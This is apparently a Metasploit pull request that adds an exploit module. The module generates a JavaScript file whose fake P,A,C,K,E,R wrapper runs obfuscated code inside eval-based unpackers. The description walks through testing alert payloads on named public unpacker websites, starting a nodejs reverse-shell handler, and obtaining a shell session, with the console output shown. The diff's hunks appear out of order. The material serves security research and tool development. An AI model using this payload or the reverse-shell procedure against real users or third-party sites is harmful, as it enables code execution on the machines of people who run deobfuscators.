### PR TITLE
Add file format exploit for injecting code into eval-based Javascript unpackers

### DIFF
--- a/modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb
+++ b/modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Javascript injection for eval-based unpackers',
+      'Name'           => 'Javascript Injection for Eval-based Unpackers',
       'Description'    => %q{
         This module generates a Javascript file that executes arbitrary code
         when an eval-based unpacker is run on it. Works against js-beautify's
@@ -29,6 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Arch'           => ARCH_NODEJS,
       'Privileged'     => false,
       'Targets'        =>	[['Automatic', {}]],
+      'DisclosureDate' => 'Feb 18 2015',
       'DefaultTarget'  => 0))
 
     register_options([

--- a/modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb
+++ b/modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb
@@ -1,0 +1,46 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/exploit/jsobfu'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::JSObfu
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Javascript injection for eval-based unpackers',
+      'Description'    => %q{
+        This module generates a Javascript file that executes arbitrary code
+        when an eval-based unpacker is run on it. Works against js-beautify's
+        P_A_C_K_E_R unpacker.
+      },
+      'Author'         => [ 'joev' ],
+      'License'        => MSF_LICENSE,
+      'References'  =>
+        [
+        ],
+      'Platform'       => 'nodejs',
+      'Arch'           => ARCH_NODEJS,
+      'Privileged'     => false,
+      'Targets'        =>	[['Automatic', {}]],
+      'DefaultTarget'  => 0))
+
+    register_options([
+      OptString.new('FILENAME', [true, 'The file name.', 'msf.js']),
+      OptString.new('CUSTOM_JS', [false, 'Custom Javascript payload.'])
+    ], self.class)
+  end
+
+  def exploit
+    p = js_obfuscate(datastore['CUSTOM_JS'] || payload.encoded);
+    print_status("Creating '#{datastore['FILENAME']}' file...")
+    file_create("eval(function(p,a,c,k,e,r){}((function(){ #{p} })(),''.split('|'),0,{}))")
+  end
+
+end


### PR DESCRIPTION
Sometimes Javascript de-obfuscators are lazy and work by continually `eval()`-ing the obfuscated code. This opens up the possibility of code injection. A popular eval-based obfuscator is [Dean Edward's `P,A,C,K,E,R`](http://dean.edwards.name/packer/), which this module imitates.
#### Verification

Test it against some unpackers online:

```
msf> use exploits/multi/fileformat/js_unpacker_injection
msf> set CUSTOM_JS 'alert("Code execution!")'
msf> run
```

Copy and paste the file contents it into:

```
http://dean.edwards.name/unpacker/
http://jsbeautifier.org/
http://www.jspretty.com/
```

You should see lots of alerts.

Sometimes these unpackers will get run through node. Let's try getting a shell. First spin up a handler:

```
msf> use exploit/multi/handelr
msf> set LHOST 0.0.0.0
msf> set PAYLOAD nodejs/shell_reverse_tcp
msf> set LPORT 4444
msf> run -j
```

Now regenerate the file using a nodejs payload:

```
msf> use exploits/multi/fileformat/js_unpacker_injection
msf> unset CUSTOM_JS
msf> set PAYLOAD nodejs/shell_reverse_tcp
msf> set LPORT 4444
msf> run
```

Save the nodejs unpacker script [here](https://gist.github.com/joevennix/0be8191baccc6fce4813). Run it like so:

```
$ node unpacker.js ~/.msf4/local/msf.js
```

And you should get a shell.

```
[*] Command shell session 1 opened (192.168.0.2:4444 -> 192.168.0.2:51633)
```
